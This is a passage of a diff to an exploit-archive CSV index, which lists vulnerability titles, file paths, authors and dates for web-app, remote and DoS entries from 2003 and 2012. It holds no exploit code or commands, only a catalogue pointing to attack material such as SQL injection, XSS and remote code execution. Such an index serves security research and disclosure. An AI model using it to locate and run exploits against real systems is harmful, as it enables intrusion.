-23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 -23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder Remote Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 -23011,platforms/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting Vulnerability",2003-08-11,G00db0y,php,webapps,0 -23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 -23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module SQL Injection Vulnerabilities",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module day Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module fatcat_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module PAGE_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0 23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0 @@ -20230,15 +20260,11 @@ id,file,description,date,author,platform,type,port 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d User.CGI Cross-Site Scripting Vulnerability",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x BBCode HTML Injection Vulnerability",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x HTMLtags.PHP Local File Include Vulnerability",2003-08-13,"Virginity Security",php,webapps,0 -23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 (packages.php, id param) SQL Injection Vulnerability",2012-11-30,"Yakir Wizman",php,webapps,0 -23029,platforms/php/webapps/23029.txt,"SmartCMS (index.php, menuitem param) SQL Injection & Cross-Site Scripting Vulnerabilities",2012-11-30,"Yakir Wizman",php,webapps,0 -23031,platforms/php/webapps/23031.txt,"silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 +23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 (packages.php id param) SQL Injection Vulnerability",2012-11-30,"Yakir Wizman",php,webapps,0 +23029,platforms/php/webapps/23029.txt,"SmartCMS (index.php menuitem param) SQL Injection & Cross-Site Scripting Vulnerabilities",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET name XSS",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET topic title XSS",2003-08-13,G00db0y,asp,webapps,0 -23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 -23035,platforms/asp/webapps/23035.txt,"Poster 2.0 Unauthorized Privileged User Access Vulnerability",2003-08-15,DarkKnight,asp,webapps,0 -23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 Administrative Privilege Escalation Vulnerability",2003-08-16,"Stephan Sattler",php,webapps,0 -23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 Http.ini Plaintext Password Storage Vulnerability",2003-08-18,rUgg1n3,windows,local,0 +23031,platforms/php/webapps/23031.txt,"silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 23038,platforms/windows/remote/23038.c,"eMule 0.2x Client OP_SERVERIDENT Heap Overflow Vulnerability",2003-09-01,"Stefan Esser",windows,remote,0 23039,platforms/php/webapps/23039.txt,"Fusion News 3.3 Unauthorized Account Addition Vulnerability",2003-08-18,DarkKnight,php,webapps,0 23040,platforms/windows/remote/23040.c,"eMule 0.2x AttachToAlreadyKnown Double Free Vulnerability",2003-09-01,"Stefan Esser",windows,remote,0 @@ -20332,6 +20358,7 @@ id,file,description,date,author,platform,type,port 23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 WWW.exe Denial of Service Vulnerability",2003-09-10,"Phuong Nguyen",windows,dos,0 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal (0day)",2012-12-04,Nin3,windows,webapps,0 +23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 Custom App Remote Code Execution",2012-12-09,metasploit,multiple,remote,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal Vulnerability",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy Vulnerability",2003-09-10,"Tim Kennedy",multiple,remote,0 @@ -20421,7 +20448,6 @@ id,file,description,date,author,platform,type,port 23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection Vulnerability",2003-10-06,"Marc Schoenefeld",multiple,remote,0 23222,platforms/windows/remote/23222.txt,"File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure Vulnerability",2003-10-06,nimber@designer.ru,windows,remote,0 23223,platforms/linux/local/23223.c,"SuSE Linux Professional 8.2 SuSEWM Configuration File Insecure Temporary File Vulnerability",2003-10-06,"Nash Leon",linux,local,0 -23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 Custom App Remote Code Execution",2012-12-09,metasploit,multiple,remote,0 23225,platforms/windows/remote/23225.rb,"Maxthon3 about:history XCS Trusted Zone Code Execution",2012-12-09,metasploit,windows,remote,0 23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server Arbitrary File Upload",2012-12-09,metasploit,windows,remote,21 23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component Command Injection",2012-12-09,metasploit,unix,remote,0 @@ -20448,6 +20474,7 @@ id,file,description,date,author,platform,type,port 23248,platforms/android/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,android,dos,0 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0 23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 - Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0 +23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass Vulnerability (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 - Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 @@ -20474,16 +20501,21 @@ id,file,description,date,author,platform,type,port 23274,platforms/linux/dos/23274.pl,"Coreutils 4.5.x LS Width Argument Integer Overflow Vulnerability",2003-10-22,druid,linux,dos,0 23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x Denied URL Cross-Site Scripting Vulnerability",2003-10-22,"Richard Maudsley",cgi,webapps,0 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0 +23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 +23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0 +23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23282,platforms/multiple/remote/23282.txt,"apache cocoon 2.14/2.2 - Directory Traversal Vulnerability",2003-10-24,"Thierry De Leeuw",multiple,remote,0 23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 - Local Resource Reference Vulnerability",2003-10-24,Mindwarper,windows,remote,0 23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0 +23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service Vulnerability",2003-10-30,"Luigi Auriemma",multiple,dos,0 23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 - CSRF Vulnerability",2012-12-11,sajith,php,webapps,0 23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,metasploit,windows,remote,0 +23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability",2003-10-30,ProXy,php,webapps,0 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass Vulnerability",2003-10-24,Mindwarper,multiple,remote,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x Security Manager Denial of Service Vulnerability",2003-10-26,"Marc Schoenefeld",multiple,dos,0 23293,platforms/windows/dos/23293.txt,"Yahoo! Messenger 5.6 File Transfer Buffer Overrun Vulnerability",2003-10-27,"Hat-Squad Security Team",windows,dos,0 @@ -20506,8 +20538,6 @@ id,file,description,date,author,platform,type,port 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 HTTP Referer Remote Buffer Overflow Vulnerability",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/webapps/23311.txt,"E107 Chatbox.php Denial of Service Vulnerability",2003-10-29,Blademaster,php,webapps,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation Vulnerability",2003-10-30,"Corsaire Limited",cgi,remote,0 -23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability",2003-10-30,ProXy,php,webapps,0 -23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service Vulnerability",2003-10-30,"Luigi Auriemma",multiple,dos,0 23315,platforms/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability",2003-10-31,"Corsaire Limited",jsp,webapps,0 23316,platforms/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting Vulnerability",2003-10-31,"Andy Davis",windows,remote,0 23317,platforms/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 Unauthorized Administrative Access Vulnerability",2003-10-31,slaizer,hardware,remote,0 @@ -20524,7 +20554,7 @@ id,file,description,date,author,platform,type,port 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (1)",2003-11-03,airsupply,windows,remote,0 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (2)",2003-11-03,exworm,windows,remote,0 23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting Vulnerability",2003-11-03,"Michael Frame",php,webapps,0 -23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 Unauthorized Private Forum Access Vulnerability",2003-11-03,"Alexander Antipov",asp,webapps,0 +23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access Vulnerability",2003-11-03,"Alexander Antipov",asp,webapps,0 23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting Vulnerability",2003-11-03,"David Ferreira",cgi,webapps,0 23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 Include.PHP Cross-Site Scripting Vulnerability",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun Vulnerability",2003-11-03,"Peter Winter-Smith",windows,remote,0 @@ -20550,6 +20580,10 @@ id,file,description,date,author,platform,type,port 23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent XSS Vulnerability",2012-12-13,"Mr. P-teo",php,webapps,0 23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant XSS",2012-12-13,limb0,php,webapps,0 23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 +23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0 +23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0 +23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 +23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) - SQL Injection Vulnerability",2012-12-13,JoinSe7en,php,webapps,0 23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,metasploit,linux,remote,0 23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 @@ -20573,13 +20607,6 @@ id,file,description,date,author,platform,type,port 23379,platforms/hardware/remote/23379.txt,"FortiGate Firewall 2.x selector Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 Error Message Cross-Site Scripting Vulnerability",2003-11-13,"Oliver Karow",multiple,remote,0 23381,platforms/php/webapps/23381.txt,"phpWebFileManager 2.0 index.php Directory Traversal Vulnerability",2003-11-17,"RusH security team",php,webapps,0 -23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 -23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0 -23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0 -23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0 -23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 -23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0 -23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0 23390,platforms/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow Vulnerability",2003-11-20,D_BuG,multiple,dos,0 23391,platforms/linux/dos/23391.txt,"FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability",2003-11-20,"Evgeny Legerov",linux,dos,0 23392,platforms/openbsd/dos/23392.c,"OpenBSD 3.3/3.4 semctl/semop Local Unexpected Array Indexing Vulnerability",2003-11-21,anonymous,openbsd,dos,0 @@ -20594,7 +20621,6 @@ id,file,description,date,author,platform,type,port 23401,platforms/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2)",2003-11-25,"Liu Die Yu",windows,remote,0 23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 23403,platforms/php/webapps/23403.pl,"My_EGallery Module 3.1.1 - Remote Include Command Injection Vulnerability",2003-11-26,"Bojan Zdrnja",php,webapps,0 -23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass Vulnerability (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass Vulnerability (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 Debug Query Information Disclosure Weakness",2003-12-01,scrap,php,webapps,0 23407,platforms/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 shopsearch.asp SQL Injection Vulnerability",2003-12-01,"Nick Gudov",asp,webapps,0 @@ -20612,9 +20638,13 @@ id,file,description,date,author,platform,type,port 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 Index.PHP Path Cross-Site Scripting Vulnerability",2003-12-09,"Justin Hagstrom",php,webapps,0 23421,platforms/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 -23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 -23423,platforms/windows/remote/23423.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 +23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6_Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 +23423,platforms/windows/remote/23423.txt,"Internet Explorer 5/6_Mozilla 1.2.1 URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Stored XSS",2012-12-16,limb0,php,webapps,0 +23449,platforms/unix/remote/23449.txt,"Xerox MicroServer Web Server Remote Directory Traversal Vulnerability",2003-12-19,"J.A. Gutierrez",unix,remote,0 +23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 Webserver Directory Traversal Vulnerability",2003-12-19,"Luigi Auriemma",windows,remote,0 +23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 Webserver Cross-Site Scripting Vulnerability",2003-12-19,"Luigi Auriemma",windows,remote,0 +23452,platforms/linux/dos/23452.txt,"Tcpdump 3.x L2TP Parser Remote Denial of Service Vulnerability",2003-12-20,"Przemyslaw Frasunek",linux,dos,0 23427,platforms/linux/dos/23427.txt,"Totem Movie Player (Ubuntu) 3.4.3 - Stack Corruption",2012-12-16,coolkaveh,linux,dos,0 23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server user.php Script Unauthorized Access Vulnerability",2003-12-10,frog,php,webapps,0 23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server SQL Injection Vulnerability",2003-12-10,"Chintan Trivedi",php,webapps,0 @@ -20637,10 +20667,6 @@ id,file,description,date,author,platform,type,port 23446,platforms/windows/remote/23446.txt,"GoAhead Webserver 2.1.x ASP Script File Source Code Disclosure Vulnerability",2002-12-17,"Luigi Auriemma",windows,remote,0 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability",2003-12-18,"Paul Craig",cgi,webapps,0 23448,platforms/php/webapps/23448.php,"phpwcms <= 1.5.4.6 - ""preg_replace"" - Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 -23449,platforms/unix/remote/23449.txt,"Xerox MicroServer Web Server Remote Directory Traversal Vulnerability",2003-12-19,"J.A. Gutierrez",unix,remote,0 -23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 Webserver Directory Traversal Vulnerability",2003-12-19,"Luigi Auriemma",windows,remote,0 -23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 Webserver Cross-Site Scripting Vulnerability",2003-12-19,"Luigi Auriemma",windows,remote,0 -23452,platforms/linux/dos/23452.txt,"Tcpdump 3.x L2TP Parser Remote Denial of Service Vulnerability",2003-12-20,"Przemyslaw Frasunek",linux,dos,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 index.inc.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 members/index.inc.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 message.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 @@ -20657,8 +20683,10 @@ id,file,description,date,author,platform,type,port 23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 store Parameter Path Disclosure Vulnerability",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 template Parameter Directory Traversal Vulnerability",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23468,platforms/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 PASS Command Remote Buffer Overflow Vulnerability",2003-12-23,storm,windows,dos,0 -23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11,5,502,135 Crash PoC",2012-12-18,coolkaveh,windows,dos,0 +23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash PoC",2012-12-18,coolkaveh,windows,dos,0 +23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution Vulnerability",2004-01-31,ActualMInd,cgi,webapps,0 23472,platforms/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",2012-12-18,metasploit,windows,remote,0 +23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection Vulnerabilities",2004-02-02,"Security Corporation",php,webapps,0 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 Email.PHP Cross-Site Scripting Vulnerability",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 Viewshoutbox.PHP Cross-Site Scripting Vulnerability",2003-12-23,"Ben Drysdale",php,webapps,0 23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 Privmsg.PHP Cross-Site Scripting Vulnerability",2003-12-23,"Ben Drysdale",php,webapps,0 @@ -20672,7 +20700,7 @@ id,file,description,date,author,platform,type,port 23483,platforms/php/webapps/23483.txt,"OpenBB 1.0 Board.PHP Cross-Site Scripting Vulnerability",2003-12-27,gr00vy,php,webapps,0 23484,platforms/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module SQL Injection Vulnerability",2003-12-27,idtwolf@pisem.net,php,webapps,0 23485,platforms/cgi/webapps/23485.txt,"L-Soft 1.8 Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,cgi,webapps,0 -23486,platforms/php/webapps/23486.txt,"Private Message System 2.x index.php Page Parameter Cross-Site Scripting Vulnerability",2003-12-27,"David S. Ferreira",php,webapps,0 +23486,platforms/php/webapps/23486.txt,"Private Message System 2.x - index.php Page Parameter Cross-Site Scripting Vulnerability",2003-12-27,"David S. Ferreira",php,webapps,0 23487,platforms/php/webapps/23487.txt,"php-ping Count Parameter Command Execution Vulnerability",2003-12-29,ppp-design,php,webapps,0 23488,platforms/cgi/webapps/23488.txt,"BulletScript MailList bsml.pl Information Disclosure Vulnerability",2003-12-29,M0rf,cgi,webapps,0 23489,platforms/windows/remote/23489.txt,"Sygate Personal Firewall 5.0 DLL Authentication Bypass Vulnerability",2003-12-29,Aphex,windows,remote,0 @@ -20681,10 +20709,14 @@ id,file,description,date,author,platform,type,port 23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (2)",2003-12-29,D4rkGr3y,windows,remote,0 23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme File Upload Vulnerabilities",2012-12-19,DigiP,php,webapps,0 +23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 File Disclosure Vulnerability",2004-01-31,"Zero X",php,webapps,0 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 GIF Decode Crash PoC",2012-12-19,"Lizhi Wang",windows,dos,0 +23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote DoS",2004-02-13,"intuit e.b.",windows,dos,0 +23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability",2004-02-13,anonymous,windows,remote,0 23498,platforms/hardware/webapps/23498.txt,"SonicWall SonicOS 5.8.1.8 WAF XSS Vulnerability",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple XSS Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,metasploit,windows,remote,0 +23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x Unauthorized Admin Access Vulnerability",2004-01-30,"Himeur Nourredine",php,webapps,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (2)",2003-12-29,"Rosiello Security",windows,remote,0 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass Vulnerability",2003-12-29,"Peter Winter-Smith",windows,remote,0 @@ -20705,6 +20737,8 @@ id,file,description,date,author,platform,type,port 23518,platforms/php/webapps/23518.txt,"HotNews 0.x config[incdir] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting Vulnerability",2004-01-04,"David S. Ferreira",php,webapps,0 23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Include Vulnerabilities",2004-01-06,Windak,php,webapps,0 +23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.PHP Cross-Site Scripting Vulnerability",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 +23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 Crash 